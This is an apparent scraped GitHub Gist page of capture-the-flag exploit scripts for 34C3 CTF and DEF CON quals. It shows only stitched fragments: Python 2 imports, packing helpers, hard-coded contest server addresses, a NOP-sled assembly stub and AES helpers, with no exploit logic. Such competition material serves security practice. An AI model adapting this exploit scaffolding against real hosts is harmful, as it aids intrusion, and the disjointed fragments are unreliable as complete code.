Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
code = """
BITS 16
begin:
times (0x1f3-2) nop
jmp main
@spq
spq / nope.py
Created January 1, 2018 16:18
34c3ctf exploits
#!/usr/bin/env python2
import socket
import struct
import telnetlib
import os, sys, time
HOST, PORT = "35.198.126.67", 4444
p32 = lambda v: struct.pack("<I", v)
p64 = lambda v: struct.pack("<Q", v)
#!/usr/bin/env python2
import socket
import struct
import telnetlib
import sys, time
import pwn
HOST, PORT = "127.0.0.1", 1234
HOST, PORT = "reeses_fc849330ede1f497195bad5213deaebc.quals.shallweplayaga.me", 3456
#!/usr/bin/env python2
import struct, socket
from Crypto.Cipher import AES
xor = lambda a,b: "".join(chr(ord(i)^ord(j)) for i,j in zip(a,b))
cipher="aes-128-cbc"
key = "A"*16
iv = key
cbc = lambda: AES.new(key, AES.MODE_CBC, iv)
ecb = AES.new(key, AES.MODE_ECB)